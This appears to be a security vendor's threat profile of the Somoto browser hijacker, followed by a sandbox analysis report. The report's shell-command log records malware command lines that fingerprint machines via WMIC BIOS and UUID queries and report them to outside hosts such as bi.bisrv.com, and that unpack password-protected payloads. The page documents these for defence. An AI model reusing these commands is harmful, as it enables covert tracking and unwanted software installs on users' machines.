Somoto

By ZulaZuza in Browser Hijackers

Threat Scorecard

Threat Level: 80 % (High)
Infected Computers: 3
First Seen: August 26, 2011
Last Seen: October 24, 2025
OS(es) Affected: Windows

The Somoto browser hijacker is a malicious toolbar and malware infection that is typically included in some freeware downloads. The Somoto browser hijacker and toolbar have been associated with several free applications for playing .flv movies (such as downloaded YouTube movies). The Somoto browser hijacker significantly alters your computer's browsing behavior. This malicious infection can cause your Internet browser to constantly redirect you to the somoto.com website. This website is a fake version of the Google search engine, designed to display results that are associated with malware and Trojan infections. If your Internet browser is constantly directing you to the Somoto website, ESG PC security researchers strongly recommend booting your PC in Safe Mode. Then, it is important that you use a fully-updated anti-malware utility to detect and remove the Somoto browser hijacker and its associated malware.

The Underlying Cause of the Somoto Infection

Most cases of infection with the Somoto browser hijacker are associated with a video application named FLV & AVI player. There are several versions of this freeware application. As part of its installation process, this program will install the Somoto toolbar and browser hijacker onto your computer. If you remove Somoto, the video player associated with Somoto will often refuse to open. ESG PC security researchers strongly recommend avoiding any applications that force you to download and install the Somoto toolbar. There are numerous free, effective video players that can give you great results without needing to download malware or install a bulky, malicious toolbar onto your Internet browser (for example, the VLC video player).

Problems Associated with the Somoto Browser Hijacker

The Somoto browser hijacker has several harmful effects on a computer system. Computer users that have become infected with this malicious toolbar report that their Internet browser homepage has been changed. The Somoto browser hijacker can also redirect your web browsing, sending you to websites that contain malicious advertisements and malware-ridden links. The Somoto infection acts as a gateway through which other more dangerous kinds of malware can infect your computer system. It is because of this that ESG PC security researchers strongly advise against leaving a Somoto infection on your computer. Having the ability to play .flv video files is not worth the risk or the annoyance of having the Somoto toolbar installed onto your computer. Other free and safe alternatives exist that can allow you to watch any format of video on your computer system.

File System Details

Somoto may create the following file(s):
# File Name Detections
1. C:Program Filessomototoolbar[RANDOM CHARACTERS].exe

Registry Details

Somoto may create the following registry entry or registry entries:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{c3721e85-f0ac-4b7e-ae4c-3e738011dc9d}

Analysis Report

General information

Family Name: Trojan.Somoto
Signature status: Root Not Trusted

Known Samples

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File has TLS information
  • File is 32-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

Windows PE Version Information

Name Value
Comments This installation was built with Inno Setup.
Company Name
  • Acala Software Inc.
  • Accmeware Corporation
  • Somoto Ltd.
File Description
  • Acala DVD Copy - Free Copy Setup
  • FilesFrog Update Checker
  • OGG to MP3 Converter Setup
  • Powered by BetterInstaller
File Version
  • 4.3.0.0
  • 2.1.0.0
  • 2.0.0.0
  • 1.0.0.1
Legal Copyright Somoto Ltd.
Product Name
  • Acala DVD Copy - Free Copy
  • FilesFrog Update Checker
  • OGG to MP3 Converter
Product Version 4.3.0

Digital Signatures

Signer | Root | Status
Site on Spot Limited | AddTrust External CA Root | Root Not Trusted
Somoto Ltd. | AddTrust External CA Root | Root Not Trusted
Somoto Ltd. | AddTrust External CA Root | Hash Mismatch
Site on Spot Limited | Site on Spot Limited | Self Signed
Somoto Ltd | VeriSign Class 3 Public Primary Certification Authority - G5 | Root Not Trusted
SITE ON SPOT Ltd. | thawte Primary Root CA | Root Not Trusted
Somoto Ltd. | thawte Primary Root CA | Root Not Trusted

File Traits

  • Installer Manifest
  • nosig nsis
  • x86

Files Modified

Registry Modifications

Windows API Usage

Category API
Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Shell Execute
  • CreateProcess
  • ShellExecute
  • WriteConsole
User Data Access
  • GetUserName
  • GetUserObjectInformation
Encryption Used
  • BCryptOpenAlgorithmProvider
  • CryptAcquireContext
  • win32u.dll!NtGdiQueryFontAssocInfo
  • win32u.dll!NtGdiSelectBitmap
  • win32u.dll!NtGdiSetLayout
  • win32u.dll!NtGdiStretchDIBitsInternal
  • win32u.dll!NtUserBeginPaint
  • win32u.dll!NtUserBuildHwndList

58 additional items are not displayed above.

Anti Debug
  • IsDebuggerPresent
Process Terminate
  • TerminateProcess
Network Wininet
  • HttpOpenRequest
  • HttpQueryInfo
  • HttpSendRequest
  • InternetConnect
  • InternetOpen
  • InternetQueryOption
  • InternetReadFile
  • InternetSetOption
Other Suspicious
  • AdjustTokenPrivileges
Network Info Queried
  • GetAdaptersInfo

Shell Command Execution

"C:\Users\Uawsxdls\AppData\Local\Temp\is-8A7VU.tmp\97763e6a25238b6096fe4850b26c199af0266e91_0004783892.tmp" /SL5="$40216,4295122,153600,c:\users\user\downloads\97763e6a25238b6096fe4850b26c199af0266e91_0004783892.exe"
"C:\Users\Jerbuoiw\AppData\Local\Temp\biclient.exe" /url bi.bisrv.com /affid "awfr7zip19788" /id "7zip" /name "7-Zip" /browser ff
WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
WMIC bios Get Version /FORMAT:textvaluelist.xsl
WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
7za.exe e -y -p"cc16e12b7c77b8f1fd959c415ad6f1e7" [RANDOM_STRING].7z
"C:\Users\Tvkaelgj\AppData\Local\Temp\is-70TM1.tmp\741cd1617ca732a9557aae6adc94b09ed834a528_0002369795.tmp" /SL5="$20146,2038800,132096,c:\users\user\downloads\741cd1617ca732a9557aae6adc94b09ed834a528_0002369795"
7za.exe e -y -p"e5584e65b7e50868783c408054621eb6" [RANDOM_STRING].7z
"C:\Users\Jkquqjyg\AppData\Local\Temp\biclient.exe" /initurl http://bi.bisrv.com/:affid:/:sid:/:uid:? /affid "oneonlinegames" /id "f1pinballzipjkdw" /name "f1-pinball.zip" /uniqid 772f121128a1196fb3a0902685bd2c3ce977df47_0000163528
7za.exe e -y -p"439603f41bcb401021ee148cf7769f1c" [RANDOM_STRING].7z
"C:\Users\Kkegjcwd\AppData\Local\Temp\nseC05D.tmp\setupcl.exe" /initurl http://sub.ginaul.info/init/7e967b2ac7d5c358275ada39ad23d5cb9aa4337c_0000413264/:uid:? /affid "-" /id "0" /name " " /uniqid 7e967b2ac7d5c358275ada39ad23d5cb9aa4337c_0000413264 /uuid /biosserial /biosversion /csname
"C:\Users\Unenjolo\AppData\Local\Temp\biclient.exe" /url bi.bisrv.com /affid "awplfreezip71908" /id "freezipuyiv" /name "Free Zip" /uniqid 1daefe7b77508ca24e22f2062d1765842b47ae93_0000166600 /browser ff
7za.exe e -y -p"f412f82a5f1cd93b46abdabe00ecb510" [RANDOM_STRING].7z
7za.exe e -y -p"2eab8c80e8a5782cfccc9f26bea533a9" [RANDOM_STRING].7z
"C:\Users\Mdoonnlr\AppData\Local\Temp\nshE9C1.tmp\lzma.exe" "d" "C:\Users\Mdoonnlr\AppData\Local\Temp\nshE9C1.tmp\bqeu1pj52d9pqz6f5p" "C:\Users\Mdoonnlr\AppData\Local\Temp\nshE9C1.tmp\biSetup56841.exe"
7za.exe e -y -p"3e17b05abcee4f17c87b1ff4058e061b" [RANDOM_STRING].7z
7za.exe e -y -p"be1bf6fa5de8fb8fcca12a9d66238c22" [RANDOM_STRING].7z
"C:\Users\Igxtfuqp\AppData\Local\Temp\~nsu.tmp\Au_.exe" _?=c:\users\user\downloads\
"c:\users\user\downloads\update_checker.exe" /disable
C:\WINDOWS\system32\regsvr32 -u /s "c:\users\user\downloads\tbcore3.dll"
open C:\WINDOWS\system32\taskkill /F /IM TbHelper2.exe
WriteConsole: ERROR: The proce
"C:\Users\Xauudzeq\AppData\Local\Temp\biclient.exe" /initurl http://bi.bisrv.com/:affid:/:sid:/:uid:? /affid "network_web3_1" /id "flvplayerorun" /name "FLV Player" /uniqid 84bad32c6b44369739fee95c09f5c65bb406abe0_0000165736
"C:\Users\Xnhonaci\AppData\Local\Temp\biclient.exe" /url bi.bisrv.com /affid "piratebaymirror" /id "adobephotoshopcs5fulltuto" /name "Adobe Photoshop CS5 Full Tuto" /uniqid 9f51722877b52840ca94e6385edf5cdf576d7239_0000166648
7za.exe e -y -p"e32e41ab4100dbfa381c34147d218c32" [RANDOM_STRING].7z
"C:\Users\Usjjhwgd\AppData\Local\Temp\nso7EF5.tmp\setupcl.exe" /initurl http://sub.ineedyoutoseewhoiam.com/init/57b18ebf961237cdb8c2e83895933513c519f5be_0000413376/:uid:? /affid "-" /id "0" /name " " /uniqid 57b18ebf961237cdb8c2e83895933513c519f5be_0000413376 /uuid /biosserial /biosversion /csname
7za.exe e -y -p"a6533e0c496d1dc546a4a166550a9e78" [RANDOM_STRING].7z
7za.exe e -y -p"8356858b5b8c00899259b2bdb8738dae" [RANDOM_STRING].7z
Fri594.exe -y -p"60c232487ce10dfdc24e885155224a99"
"C:\Users\Veduunjr\AppData\Local\Temp\nscA833.tmp\setupcl.exe" /initurl http://sub.hereon.info/init/11575c9383a99e48641bd823ab8012c5fb80d281_0000225432/:uid:? /affid "-" /id "0" /name " " /uniqid 11575c9383a99e48641bd823ab8012c5fb80d281_0000225432 /uuid /biosserial /biosversion /csname
7za.exe e -y -p"6710f9307edc7adad3dcdf8476078f55" [RANDOM_STRING].7z
"C:\Users\Yxdhyzeq\AppData\Local\Temp\nstC222.tmp\setupcl.exe" /initurl http://sub.rhionx.info/init/70d1d67c1f0a2d5a120eb07a3bc16cfd3efd178e_0000413304/:uid:? /affid "-" /id "0" /name " " /uniqid 70d1d67c1f0a2d5a120eb07a3bc16cfd3efd178e_0000413304 /uuid /biosserial /biosversion /csname
wmic bios get serialnumber
7za.exe e -y -p"61c3811f51c7ef2cca3cfa2e6437e545" [RANDOM_STRING].7z
